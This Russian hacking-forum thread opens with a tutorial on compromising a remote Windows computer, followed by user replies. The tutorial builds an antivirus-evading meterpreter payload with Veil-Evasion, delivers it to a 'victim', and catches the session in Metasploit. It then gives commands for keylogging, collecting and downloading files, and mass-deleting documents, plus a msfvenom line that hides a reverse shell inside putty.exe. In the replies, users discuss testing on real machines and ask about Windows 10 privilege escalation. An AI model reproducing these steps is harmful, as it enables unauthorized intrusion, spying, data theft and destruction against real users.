Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit

В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.

UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/


Ниже представлена схема, по которой будет осуществляться проникновение.

upload_2016-7-26_15-33-33.png


Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)

2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.

Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Код:
apt-get -y install git
git clone https://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/
cd setup
setup.sh -c
Следим за установкой, соглашаемся и все устанавливаем.

Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.

upload_2016-7-26_15-34-5.png


Далее вводим команду list – она покажет список доступных payload.

upload_2016-7-26_15-34-57.png


Нас интересует номер 32python/meterpreter/reverse_https

Вводим - use 32

upload_2016-7-26_15-35-15.png


Задаем опции будущему файлу, вводим последовательно следующие команды:

set LHOST 83.199.12.XXX (Ваш публичный IP)

set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).

set USE_PYHERION Y (используем энкриптор)

generate (создаем .exe файл)

Вводим имя создаваемого файла.

Выбираем вторую строку, жмем 2.

upload_2016-7-26_15-35-36.png


Ждем успешной генерации файла.

upload_2016-7-26_15-35-57.png


Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.

Выходим из Veil-Evasion.

Запускаем Metasploit.
#msfconsole

Далее
Код:
msf > use multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_https
msf exploit (handler) > set LHOST (свой внутренний IP)
msf exploit (handler)  > set LPORT 443
msf exploit (handler) >exploit
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.

upload_2016-7-26_15-37-23.png


Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.

Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.

migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.

1. Кейлоггер
meterpreter > bgrun keylogrecorder

[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording

meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2...

2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:

run file_collector -r -d e:\\ -f * -o /root/ file.txt


Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst


Скачиваем файлы на свой компьютер.

run file_collector -i /root /file.lst -l /root/

Полагаю не нужно обьяснять, что делают скрипты upload и download)

3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.

4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell

Удаление файлов exe:
del e:\*.* /f /s /q

удаление файлов doc:
del e:\*.doc /f /s /q


удаление файлов pdf:
del e:\*.pdf /f /s /q


5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Краткое пояснение аргументов команды:
- a 86 - архитектура процессора.
--platform windows - тут понятно.
- x - указать пользовательский исполняемый файл для использования в качестве шаблона.
- k - сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
- p - тип полезной нагрузки.
- e - тип енкодера.
- b - помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
- f - формат выходного файла.

За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.

Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
 
Последнее редактирование:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
"сквид + сасм если тебе вооще понятны эти термины" - достаточно понятны.
"скопировал мануалы с английских сайтов и выдаешь их тут за свои" - Укажи на копии. За свои не выдаю, а пытаюсь сделать материалы более доступными для всех интересующихся. Так же сам и практикуюсь. Так как в русскоязычном сегменте подобной информации мало.
Как сверх-спеца, я себя не позиционирую.
Модератор - не значит учитель, помочь я тебе правда хотел, так как мне самому интересна эта тема.
PS: Еще одно сообщение не по теме - буду удалять.
 
M

MAdDog719

Woweb наверняка не больше 15 лет. Хакер епта. Какая вообще разница. виртуалка не виртуалка, я тестировал на реальной машине, просил друга запускать мои файлы, макросы и т д. все работает. WoWeb ищи проблему в себе.

ЗЫ. Сори. что то подгорело мальца. День был тяжелый.
 
  • Нравится
Реакции: Mixa и Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Woweb наверняка не больше 15 лет. Хакер епта. Какая вообще разница. виртуалка не виртуалка, я тестировал на реальной машине, просил друга запускать мои файлы, макросы и т д. все работает. WoWeb ищи проблему в себе.

ЗЫ. Сори. что то подгорело мальца. День был тяжелый.
Это верно, на эмоциях многого не добьешься.
 
M

MAdDog719

Подскажите годный скрипт на повышение привелегий в win 10 home x32. getsystem не работает. Мб с exploit_db послветуете, заодно расскажете как собрать да запустить)

Спасибо
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Подскажите годный скрипт на повышение привелегий в win 10 home x32. getsystem не работает. Мб с exploit_db послветуете, заодно расскажете как собрать да запустить)

Спасибо
Вот мне 10-ка вообще пока не дается)) https://codeby.net/threads/bypass-uac-metasploit.57901/ Второй способ из этой темы не пробовали? Я хотел вечером сегодня потестить, но если вы раньше, то отпишитесь потом, плз)
 
  • Нравится
Реакции: MAdDog719
M

MAdDog719

Вот мне 10-ка вообще пока не дается)) https://codeby.net/threads/bypass-uac-metasploit.57901/ Второй способ из этой темы не пробовали? Я хотел вечером сегодня потестить, но если вы раньше, то отпишитесь потом, плз)
Хотел попробовать в "боевом режиме" на реальной машине, но блин SSH сессия чет закрылась. Придется после работы на домашнем компе тестить. Отпишусь как проверю.
 
M

MAdDog719

Вот мне 10-ка вообще пока не дается)) https://codeby.net/threads/bypass-uac-metasploit.57901/ Второй способ из этой темы не пробовали? Я хотел вечером сегодня потестить, но если вы раньше, то отпишитесь потом, плз)
Не пробивает скрипт защитника. Вот что получается
4b386b1391f4t.jpg


Какие есть еще предложения, как повысить привилегии в win 10 home ?

Постарались над защитником, не пробивной) пробовал добавить в исключения папки куда заливаются dllки но все равно не проходит трюк
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Не пробивает скрипт защитника. Вот что получается
4b386b1391f4t.jpg


Какие есть еще предложения, как повысить привилегии в win 10 home ?

Постарались над защитником, не пробивной) пробовал добавить в исключения папки куда заливаются dllки но все равно не проходит трюк
Сегодня вечером будет новая инфа, в отдельной статье, почти готово уже
 
  • Нравится
Реакции: MAdDog719

koldonuuchu

Green Team
04.11.2016
36
46
BIT
0
Woweb наверняка не больше 15 лет. Хакер епта. Какая вообще разница. виртуалка не виртуалка, я тестировал на реальной машине, просил друга запускать мои файлы, макросы и т д. все работает. WoWeb ищи проблему в себе.

ЗЫ. Сори. что то подгорело мальца. День был тяжелый.
Таких юзеров нужно на вечный бан отправлять! Пускай для начала познакомятся с терминалом, а потом уже за пентест берутся!!!
 

koldonuuchu

Green Team
04.11.2016
36
46
BIT
0
Фильмов насмотрятся где все за 5 сек взламывают. Еще прочесть мануал внимательней не могут
 
  • Нравится
Реакции: Vander
W

woweb

Мы поступим по-другому: вы пишите этот обзор, после чего мы начинаем вас

До аргументирования обвинения в копировании чужих статей И написания обзора ВСЕ ваши новые сообщения подлежат удалению.
 
Последнее редактирование модератором:
L

lamerhacker

Зачем писать тему? если знаешь что её буду критиковать значит вы виноваты не правильно сделали описание хоть не поленитесь давать точные сведения а не урывками с разных сайтов если не можете то прошу хоть ссылку на пример в ютуб хотя.
 
  • Нравится
Реакции: -=S_U_N_Y=-
W

woweb

Мы поступим по-другому: вы пишите этот обзор, после чего мы начинаем вас

До аргументирования обвинения в копировании чужих статей И написания обзора ВСЕ ваши новые сообщения подлежат удалению.
 
Последнее редактирование модератором:

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Зачем писать тему? если знаешь что её буду критиковать значит вы виноваты не правильно сделали описание хоть не поленитесь давать точные сведения а не урывками с разных сайтов если не можете то прошу хоть ссылку на пример в ютуб хотя.
А у вас, что не получается?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!